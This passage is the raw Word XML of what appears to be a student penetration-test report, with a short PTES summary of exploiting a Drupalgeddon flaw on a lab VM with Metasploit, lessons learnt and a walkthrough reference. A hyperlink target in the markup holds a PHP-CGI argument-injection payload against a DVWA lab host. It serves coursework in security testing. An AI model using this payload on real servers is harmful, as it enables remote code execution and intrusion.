        <w:lastRenderedPageBreak/>
        <w:t>200-Word PTES Report</w:t>
      </w:r>
      <w:bookmarkEnd w:id="16"/>
    </w:p>
    <w:p w14:paraId="3121CC7E" w14:textId="77777777" w:rsidR="005705DF" w:rsidRDefault="005705DF" w:rsidP="005705DF">
      <w:r w:rsidRPr="00162832">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Executive Summary</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00B37ED0">
        <w:t xml:space="preserve">To mimic actual attack scenarios, a penetration test was carried out against a susceptible virtual server hosting a Drupal web application. The evaluation concentrated on finding exploitable vulnerabilities and adhered to the Penetration Testing Execution Standard (PTES) methodology. The </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B37ED0">
        <w:t>Drupalgeddon</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B37ED0">
        <w:t xml:space="preserve"> vulnerability, which enables attackers to carry out Remote Code Execution (RCE), was found during the test. The vulnerability was successfully exploited to get command execution on the target system using the Metasploit Framework from a Kali Linux environment. This verified that the web application was using an out-of-date and vulnerable Drupal version. The exploitation highlights the serious threat that unpatched web apps offer. Remedial actions must be taken right away to stop data breaches, illegal system access, and additional internal infrastructure compromise.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="283E9174" w14:textId="77777777" w:rsidR="000E376E" w:rsidRPr="00162832" w:rsidRDefault="000E376E" w:rsidP="005705DF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="78AECA7F" w14:textId="77777777" w:rsidR="005705DF" w:rsidRDefault="005705DF" w:rsidP="005705DF">
      <w:r w:rsidRPr="00162832">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Findings</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00DD5B4F">
        <w:t xml:space="preserve">An out-of-date Drupal installation that was accessible via the HTTP service on port 80 was found by the OpenVAS vulnerability scan. The flaw is similar to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DD5B4F">
        <w:t>Drupalgeddon</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DD5B4F">
        <w:t>, which enables hackers to remotely run system instructions and insert malicious SQL queries. A shell session with web-server privileges was successfully created on the server by utilizing the Metasploit exploit module. This suggests a serious flaw with a high CVSS score that gives hackers complete access to the system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="676DE146" w14:textId="77777777" w:rsidR="000E376E" w:rsidRPr="00162832" w:rsidRDefault="000E376E" w:rsidP="005705DF"/>
    <w:p w14:paraId="649B6A56" w14:textId="77777777" w:rsidR="005705DF" w:rsidRDefault="005705DF" w:rsidP="005705DF">
      <w:r w:rsidRPr="00162832">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Recommendations</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00162832">
        <w:t>Upgrade Drupal to the latest stable version, apply all security patches, and implement a Web Application Firewall. Regular vulnerability scanning and patch management policies should be enforced to prevent similar risks in the future.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="394B5D5A" w14:textId="77777777" w:rsidR="005705DF" w:rsidRDefault="005705DF" w:rsidP="005705DF"/>
    <w:p w14:paraId="5BBD4D01" w14:textId="77777777" w:rsidR="009D7095" w:rsidRPr="004C3BBD" w:rsidRDefault="005705DF" w:rsidP="004C3BBD">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="17" w:name="_Toc224128489"/>
      <w:r w:rsidRPr="004C3BBD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>100-Word Non-Technical Summary</w:t>
      </w:r>
      <w:bookmarkEnd w:id="17"/>
    </w:p>
    <w:p w14:paraId="62CB1F28" w14:textId="140AA651" w:rsidR="005705DF" w:rsidRPr="0066097E" w:rsidRDefault="005705DF" w:rsidP="005705DF">
      <w:r w:rsidRPr="0066097E">
        <w:t xml:space="preserve">To assess a virtual machine hosting a Drupal website's resistance to cyberattacks, a security test was conducted. The website was using an out-of-date version of Drupal with a serious vulnerability called </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0066097E">
        <w:t>Drupalgeddon</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0066097E">
        <w:t>, according to the test. Due to this vulnerability, attackers might potentially gain unauthorized access of the system by remotely executing commands on the server. The vulnerability was successfully exploited to show the impact using penetration testing tools. This problem could result in data theft, system compromise, or service interruption if it is not patched. The company should update Drupal to the most recent version and put in place more robust web application security measures to mitigate this risk.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2577215E" w14:textId="77777777" w:rsidR="005705DF" w:rsidRPr="00162832" w:rsidRDefault="005705DF" w:rsidP="005705DF"/>
    <w:p w14:paraId="6647D2D6" w14:textId="77777777" w:rsidR="005705DF" w:rsidRPr="00162832" w:rsidRDefault="005705DF" w:rsidP="005705DF"/>
    <w:p w14:paraId="6C7044B7" w14:textId="77777777" w:rsidR="005705DF" w:rsidRPr="00186A73" w:rsidRDefault="005705DF" w:rsidP="005705DF"/>
    <w:p w14:paraId="168C2AAC" w14:textId="77777777" w:rsidR="00360E52" w:rsidRDefault="00360E52" w:rsidP="00360E52"/>
    <w:p w14:paraId="24ACF2D7" w14:textId="77777777" w:rsidR="003402FB" w:rsidRDefault="003402FB" w:rsidP="00360E52"/>
    <w:p w14:paraId="30FD65F8" w14:textId="77777777" w:rsidR="003402FB" w:rsidRDefault="003402FB" w:rsidP="00360E52"/>
    <w:p w14:paraId="4DCD5C82" w14:textId="2158806B" w:rsidR="003402FB" w:rsidRDefault="00B465E3" w:rsidP="00B465E3">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="18" w:name="_Toc224128490"/>
      <w:r w:rsidRPr="00B465E3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Lessons Learnt</w:t>
      </w:r>
      <w:bookmarkEnd w:id="18"/>
    </w:p>
    <w:p w14:paraId="5D761DF0" w14:textId="6BA16749" w:rsidR="00B465E3" w:rsidRDefault="006335DE" w:rsidP="00B465E3">
      <w:r>
        <w:t>In this task I got to learn on how to s</w:t>
      </w:r>
      <w:r w:rsidRPr="00054C3F">
        <w:t>imulate a chained attack on Metasploitable2 VM</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="009040F6">
        <w:t xml:space="preserve">exploit DVWA VM machine, </w:t>
      </w:r>
      <w:r w:rsidR="0094057B">
        <w:t xml:space="preserve">draw a network attack path diagram, </w:t>
      </w:r>
      <w:r w:rsidR="005F2AFC">
        <w:t>exploit Windows 7 and DC-1 machines.</w:t>
      </w:r>
      <w:r w:rsidR="003207C9">
        <w:t xml:space="preserve"> Additionally</w:t>
      </w:r>
      <w:r w:rsidR="00EE67E0">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="003207C9">
        <w:t xml:space="preserve"> I also got to learn on how to write an email to developers regarding the exploit</w:t>
      </w:r>
      <w:r w:rsidR="00EE67E0">
        <w:t xml:space="preserve"> and also </w:t>
      </w:r>
      <w:r w:rsidR="00615593">
        <w:t>write a PTES report.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23631420" w14:textId="77777777" w:rsidR="00F72CB7" w:rsidRDefault="00F72CB7" w:rsidP="00B465E3"/>
    <w:p w14:paraId="65D9F6D6" w14:textId="77777777" w:rsidR="00F72CB7" w:rsidRDefault="00F72CB7" w:rsidP="00B465E3"/>
    <w:p w14:paraId="15D6BF9C" w14:textId="77777777" w:rsidR="00F72CB7" w:rsidRDefault="00F72CB7" w:rsidP="00B465E3"/>
    <w:p w14:paraId="0465B73D" w14:textId="77777777" w:rsidR="00F72CB7" w:rsidRDefault="00F72CB7" w:rsidP="00B465E3"/>
    <w:p w14:paraId="44CDCAB3" w14:textId="77777777" w:rsidR="00F72CB7" w:rsidRDefault="00F72CB7" w:rsidP="00B465E3"/>
    <w:p w14:paraId="02E9CDF3" w14:textId="77777777" w:rsidR="00F72CB7" w:rsidRDefault="00F72CB7" w:rsidP="00B465E3"/>
    <w:p w14:paraId="1EC18139" w14:textId="77777777" w:rsidR="00F72CB7" w:rsidRDefault="00F72CB7" w:rsidP="00B465E3"/>
    <w:p w14:paraId="5ABD4526" w14:textId="77777777" w:rsidR="00F72CB7" w:rsidRDefault="00F72CB7" w:rsidP="00B465E3"/>
    <w:p w14:paraId="29FE8153" w14:textId="77777777" w:rsidR="00F72CB7" w:rsidRDefault="00F72CB7" w:rsidP="00B465E3"/>
    <w:p w14:paraId="4FCD4104" w14:textId="77777777" w:rsidR="00F72CB7" w:rsidRDefault="00F72CB7" w:rsidP="00B465E3"/>
    <w:p w14:paraId="1F2913CC" w14:textId="77777777" w:rsidR="00F72CB7" w:rsidRDefault="00F72CB7" w:rsidP="00B465E3"/>
    <w:p w14:paraId="61B01680" w14:textId="77777777" w:rsidR="00F72CB7" w:rsidRDefault="00F72CB7" w:rsidP="00B465E3"/>
    <w:p w14:paraId="58AA9864" w14:textId="77777777" w:rsidR="00F72CB7" w:rsidRDefault="00F72CB7" w:rsidP="00B465E3"/>
    <w:p w14:paraId="1050BFF3" w14:textId="77777777" w:rsidR="00F72CB7" w:rsidRDefault="00F72CB7" w:rsidP="00B465E3"/>
    <w:p w14:paraId="3356822F" w14:textId="77777777" w:rsidR="00F72CB7" w:rsidRDefault="00F72CB7" w:rsidP="00B465E3"/>
    <w:p w14:paraId="0E16E07B" w14:textId="77777777" w:rsidR="00F72CB7" w:rsidRDefault="00F72CB7" w:rsidP="00B465E3"/>
    <w:p w14:paraId="265A00DD" w14:textId="77777777" w:rsidR="00F72CB7" w:rsidRDefault="00F72CB7" w:rsidP="00B465E3"/>
    <w:p w14:paraId="598154DA" w14:textId="77777777" w:rsidR="00F72CB7" w:rsidRDefault="00F72CB7" w:rsidP="00B465E3"/>
    <w:p w14:paraId="2B09A2C0" w14:textId="77777777" w:rsidR="00F72CB7" w:rsidRDefault="00F72CB7" w:rsidP="00B465E3"/>
    <w:p w14:paraId="6C346575" w14:textId="77777777" w:rsidR="00F72CB7" w:rsidRDefault="00F72CB7" w:rsidP="00B465E3"/>
    <w:p w14:paraId="77F096DE" w14:textId="77777777" w:rsidR="00F72CB7" w:rsidRDefault="00F72CB7" w:rsidP="00B465E3"/>
    <w:p w14:paraId="09F50232" w14:textId="77777777" w:rsidR="00F72CB7" w:rsidRDefault="00F72CB7" w:rsidP="00B465E3"/>
    <w:p w14:paraId="227465EF" w14:textId="77777777" w:rsidR="00F72CB7" w:rsidRDefault="00F72CB7" w:rsidP="00B465E3"/>
    <w:p w14:paraId="087AE32C" w14:textId="77777777" w:rsidR="00F72CB7" w:rsidRDefault="00F72CB7" w:rsidP="00B465E3"/>
    <w:p w14:paraId="0C56260D" w14:textId="77777777" w:rsidR="00F72CB7" w:rsidRDefault="00F72CB7" w:rsidP="00B465E3"/>
    <w:p w14:paraId="42E735BB" w14:textId="77777777" w:rsidR="00F72CB7" w:rsidRDefault="00F72CB7" w:rsidP="00B465E3"/>
    <w:p w14:paraId="4D06B1C7" w14:textId="77777777" w:rsidR="00F72CB7" w:rsidRDefault="00F72CB7" w:rsidP="00B465E3"/>
    <w:p w14:paraId="4792AFD6" w14:textId="77777777" w:rsidR="00F72CB7" w:rsidRDefault="00F72CB7" w:rsidP="00B465E3"/>
    <w:p w14:paraId="336FEEE8" w14:textId="77777777" w:rsidR="00F72CB7" w:rsidRDefault="00F72CB7" w:rsidP="00B465E3"/>
    <w:p w14:paraId="21EB97A5" w14:textId="77777777" w:rsidR="00F72CB7" w:rsidRDefault="00F72CB7" w:rsidP="00B465E3"/>
    <w:p w14:paraId="44264B31" w14:textId="77777777" w:rsidR="00F72CB7" w:rsidRDefault="00F72CB7" w:rsidP="00B465E3"/>
    <w:p w14:paraId="2D42547A" w14:textId="77777777" w:rsidR="00F72CB7" w:rsidRDefault="00F72CB7" w:rsidP="00B465E3"/>
    <w:p w14:paraId="3DC07005" w14:textId="77777777" w:rsidR="00F72CB7" w:rsidRDefault="00F72CB7" w:rsidP="00B465E3"/>
    <w:p w14:paraId="130D3E46" w14:textId="77777777" w:rsidR="00F72CB7" w:rsidRDefault="00F72CB7" w:rsidP="00B465E3"/>
    <w:p w14:paraId="64A51465" w14:textId="77777777" w:rsidR="00F72CB7" w:rsidRDefault="00F72CB7" w:rsidP="00B465E3"/>
    <w:p w14:paraId="71923F58" w14:textId="77777777" w:rsidR="00F72CB7" w:rsidRDefault="00F72CB7" w:rsidP="00B465E3"/>
    <w:p w14:paraId="7C2A0F6F" w14:textId="77777777" w:rsidR="00F72CB7" w:rsidRDefault="00F72CB7" w:rsidP="00B465E3"/>
    <w:p w14:paraId="16968761" w14:textId="77777777" w:rsidR="00F72CB7" w:rsidRDefault="00F72CB7" w:rsidP="00B465E3"/>
    <w:p w14:paraId="0D3C5855" w14:textId="77777777" w:rsidR="00245E88" w:rsidRDefault="00245E88" w:rsidP="00245E88"/>
    <w:p w14:paraId="4C0939B4" w14:textId="590D3360" w:rsidR="00F72CB7" w:rsidRDefault="00F72CB7" w:rsidP="00F72CB7">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="19" w:name="_Toc224128491"/>
      <w:r w:rsidRPr="00F72CB7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>References</w:t>
      </w:r>
      <w:bookmarkEnd w:id="19"/>
    </w:p>
    <w:p w14:paraId="3558AB85" w14:textId="586CF97A" w:rsidR="00F72CB7" w:rsidRPr="00F72CB7" w:rsidRDefault="003B1BE7" w:rsidP="00F72CB7">
      <w:hyperlink r:id="rId78" w:history="1">
        <w:r w:rsidRPr="009C50AE">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://pratham2011-guiqe.wordpress.com/2025/09/04/%e2%98%95-dark-roast-security-dc1-vulnhub-walkthrough/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00F72CB7" w:rsidRPr="00F72CB7" w:rsidSect="003B4604">
      <w:headerReference w:type="default" r:id="rId79"/>
      <w:footerReference w:type="default" r:id="rId80"/>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B0AC0" w14:textId="77777777" w:rsidR="00A032E1" w:rsidRDefault="00A032E1">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="69032446" w14:textId="77777777" w:rsidR="00A032E1" w:rsidRDefault="00A032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ADE9F" w14:textId="77777777" w:rsidR="00A032E1" w:rsidRDefault="00A032E1">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="28C7B8A5" w14:textId="77777777" w:rsidR="00A032E1" w:rsidRDefault="00A032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26675"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="9EE2CC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7A24DB"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="AD1699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F1556A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="DA1641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A55821"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="802E0A8C"/>
    <w:lvl w:ilvl="0" w:tplc="610222D4">
      <w:start w:val="2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D57D27"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="152A4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2567C5"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="9EAE27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4E50D2"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="660A1568"/>
    <w:lvl w:ilvl="0" w:tplc="F01CE4D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7B0D40"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="38160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4747AA"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="893064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6666348">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1865248357">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1736657811">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="21561365">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="307439446">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="733891701">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="539124890">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="1350983249">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="19626906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54C3F"/>
    <w:rsid w:val="000745D8"/>
    <w:rsid w:val="0008543C"/>
    <w:rsid w:val="000B0E5F"/>
    <w:rsid w:val="000B564B"/>
    <w:rsid w:val="000B5720"/>
    <w:rsid w:val="000E1881"/>
    <w:rsid w:val="000E376E"/>
    <w:rsid w:val="000E72D9"/>
    <w:rsid w:val="00105C14"/>
    <w:rsid w:val="00122FAC"/>
    <w:rsid w:val="0016213D"/>
    <w:rsid w:val="001804B1"/>
    <w:rsid w:val="00197320"/>
    <w:rsid w:val="001B62EF"/>
    <w:rsid w:val="001E2720"/>
    <w:rsid w:val="001E329F"/>
    <w:rsid w:val="001E3415"/>
    <w:rsid w:val="001F42A3"/>
    <w:rsid w:val="0020061E"/>
    <w:rsid w:val="00205414"/>
    <w:rsid w:val="00234E79"/>
    <w:rsid w:val="002355CE"/>
    <w:rsid w:val="0024036F"/>
    <w:rsid w:val="00245E88"/>
    <w:rsid w:val="00247D95"/>
    <w:rsid w:val="002A4ACA"/>
    <w:rsid w:val="003207C9"/>
    <w:rsid w:val="00324AAC"/>
    <w:rsid w:val="003333D5"/>
    <w:rsid w:val="003402FB"/>
    <w:rsid w:val="003512C3"/>
    <w:rsid w:val="003605C1"/>
    <w:rsid w:val="00360E52"/>
    <w:rsid w:val="0037481A"/>
    <w:rsid w:val="003B1BE7"/>
    <w:rsid w:val="003B4604"/>
    <w:rsid w:val="003D20B9"/>
    <w:rsid w:val="003E08DB"/>
    <w:rsid w:val="003E1D51"/>
    <w:rsid w:val="003E4727"/>
    <w:rsid w:val="00400A21"/>
    <w:rsid w:val="00407988"/>
    <w:rsid w:val="00412C92"/>
    <w:rsid w:val="0041690A"/>
    <w:rsid w:val="00426E58"/>
    <w:rsid w:val="00433D87"/>
    <w:rsid w:val="004B4B99"/>
    <w:rsid w:val="004C3BBD"/>
    <w:rsid w:val="004D61AA"/>
    <w:rsid w:val="00514F54"/>
    <w:rsid w:val="00524139"/>
    <w:rsid w:val="005705DF"/>
    <w:rsid w:val="00580BB9"/>
    <w:rsid w:val="005871C8"/>
    <w:rsid w:val="005D25E8"/>
    <w:rsid w:val="005E73D2"/>
    <w:rsid w:val="005F2AFC"/>
    <w:rsid w:val="00615593"/>
    <w:rsid w:val="00623517"/>
    <w:rsid w:val="0062568D"/>
    <w:rsid w:val="006335DE"/>
    <w:rsid w:val="00634134"/>
    <w:rsid w:val="0064164B"/>
    <w:rsid w:val="00650621"/>
    <w:rsid w:val="00674841"/>
    <w:rsid w:val="006947CB"/>
    <w:rsid w:val="006A7DB5"/>
    <w:rsid w:val="00764C9B"/>
    <w:rsid w:val="00765C6C"/>
    <w:rsid w:val="00783A41"/>
    <w:rsid w:val="007A277D"/>
    <w:rsid w:val="007B173C"/>
    <w:rsid w:val="007C32D3"/>
    <w:rsid w:val="007E34ED"/>
    <w:rsid w:val="007F26BA"/>
    <w:rsid w:val="00807523"/>
    <w:rsid w:val="0081510E"/>
    <w:rsid w:val="00817C08"/>
    <w:rsid w:val="00865CCC"/>
    <w:rsid w:val="00893845"/>
    <w:rsid w:val="008F6ABD"/>
    <w:rsid w:val="009040F6"/>
    <w:rsid w:val="00926602"/>
    <w:rsid w:val="0094057B"/>
    <w:rsid w:val="009467DE"/>
    <w:rsid w:val="0094794C"/>
    <w:rsid w:val="00963CE9"/>
    <w:rsid w:val="00985C64"/>
    <w:rsid w:val="00986927"/>
    <w:rsid w:val="009B2BDE"/>
    <w:rsid w:val="009B4C35"/>
    <w:rsid w:val="009B6671"/>
    <w:rsid w:val="009D7095"/>
    <w:rsid w:val="009E0A3A"/>
    <w:rsid w:val="009F00FF"/>
    <w:rsid w:val="00A032E1"/>
    <w:rsid w:val="00A50F2F"/>
    <w:rsid w:val="00A87FAB"/>
    <w:rsid w:val="00AE0E95"/>
    <w:rsid w:val="00AE0F8A"/>
    <w:rsid w:val="00AF1081"/>
    <w:rsid w:val="00B03C41"/>
    <w:rsid w:val="00B0410B"/>
    <w:rsid w:val="00B04D10"/>
    <w:rsid w:val="00B1555E"/>
    <w:rsid w:val="00B244E5"/>
    <w:rsid w:val="00B37817"/>
    <w:rsid w:val="00B44C18"/>
    <w:rsid w:val="00B465E3"/>
    <w:rsid w:val="00B815D3"/>
    <w:rsid w:val="00B82CBA"/>
    <w:rsid w:val="00BA3E30"/>
    <w:rsid w:val="00BA4958"/>
    <w:rsid w:val="00BB375B"/>
    <w:rsid w:val="00C004FE"/>
    <w:rsid w:val="00C078C8"/>
    <w:rsid w:val="00C23FEB"/>
    <w:rsid w:val="00C37CD1"/>
    <w:rsid w:val="00C776D2"/>
    <w:rsid w:val="00C94CE0"/>
    <w:rsid w:val="00CA03E3"/>
    <w:rsid w:val="00CA2BD3"/>
    <w:rsid w:val="00D02628"/>
    <w:rsid w:val="00D03E05"/>
    <w:rsid w:val="00D04DED"/>
    <w:rsid w:val="00D406DA"/>
    <w:rsid w:val="00D6040A"/>
    <w:rsid w:val="00D73D0A"/>
    <w:rsid w:val="00D75637"/>
    <w:rsid w:val="00D7565D"/>
    <w:rsid w:val="00D77712"/>
    <w:rsid w:val="00DA4D9A"/>
    <w:rsid w:val="00DB227C"/>
    <w:rsid w:val="00DB39AD"/>
    <w:rsid w:val="00DD4027"/>
    <w:rsid w:val="00DE0C36"/>
    <w:rsid w:val="00E05682"/>
    <w:rsid w:val="00E05D56"/>
    <w:rsid w:val="00E16CA2"/>
    <w:rsid w:val="00E24C09"/>
    <w:rsid w:val="00E74BD7"/>
    <w:rsid w:val="00E75816"/>
    <w:rsid w:val="00E84B5D"/>
    <w:rsid w:val="00E95037"/>
    <w:rsid w:val="00EB09E3"/>
    <w:rsid w:val="00ED730A"/>
    <w:rsid w:val="00EE0567"/>
    <w:rsid w:val="00EE67E0"/>
    <w:rsid w:val="00F12DCC"/>
    <w:rsid w:val="00F413A1"/>
    <w:rsid w:val="00F45D7C"/>
    <w:rsid w:val="00F616F2"/>
    <w:rsid w:val="00F670DD"/>
    <w:rsid w:val="00F72CB7"/>
    <w:rsid w:val="00F85424"/>
    <w:rsid w:val="00FA19AA"/>
    <w:rsid w:val="00FC7247"/>
    <w:rsid w:val="00FD6F37"/>
    <w:rsid w:val="00FE1BBF"/>
    <w:rsid w:val="00FE5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054C3F"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="table" w:styleId="TableGrid">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="TableNormal"/>
    <w:uiPriority w:val="39"/>
    <w:rsid w:val="003D20B9"/>
    <w:pPr>
      <w:spacing w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBid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20B9"/>
    <w:rPr>
      <w:color w:val="0000FF" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="UnresolvedMention">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="003B1BE7"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOCHeading">
    <w:name w:val="TOC Heading"/>
    <w:basedOn w:val="Heading1"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="0024036F"/>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24036F"/>
    <w:pPr>
      <w:spacing w:after="100"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC2">
    <w:name w:val="toc 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="0024036F"/>
    <w:pPr>
      <w:spacing w:after="100"/>
      <w:ind w:left="220"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC3">
    <w:name w:val="toc 3"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="0024036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http://192.168.1.27/dvwa/" TargetMode="External"/><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48.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192.168.1.27/dvwa/" TargetMode="External"/><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192.168.1.27/dvwa/" TargetMode="External"/><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192.168.1.27/sitemap.xml" TargetMode="External"/><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192.168.1.27/dvwa/login.php?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input" TargetMode="External"/><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hyperlink" Target="https://pratham2011-guiqe.wordpress.com/2025/09/04/%e2%98%95-dark-roast-security-dc1-vulnhub-walkthrough/"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hyperlink" Target="http://192.168.1.27/dvwa/?-s" TargetMode="External"/><Relationship Id="rId66" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image53.png"/></Relationships>
</file>

<file path=word/_rels/header1.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId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4A73A-8D09-45BA-ABF0-7C7648FC3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2404</Words>
  <Characters>13705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Hussain Shaikh</dc:creator>
  <cp:lastModifiedBy>Mohammed Hussain Shaikh</cp:lastModifiedBy>
  <cp:revision>748</cp:revision>
  <cp:lastPrinted>2026-03-11T09:36:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-07-21T00:34:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-03-11T09:36:00Z</dcterms:modified>
</cp:coreProperties>
</file>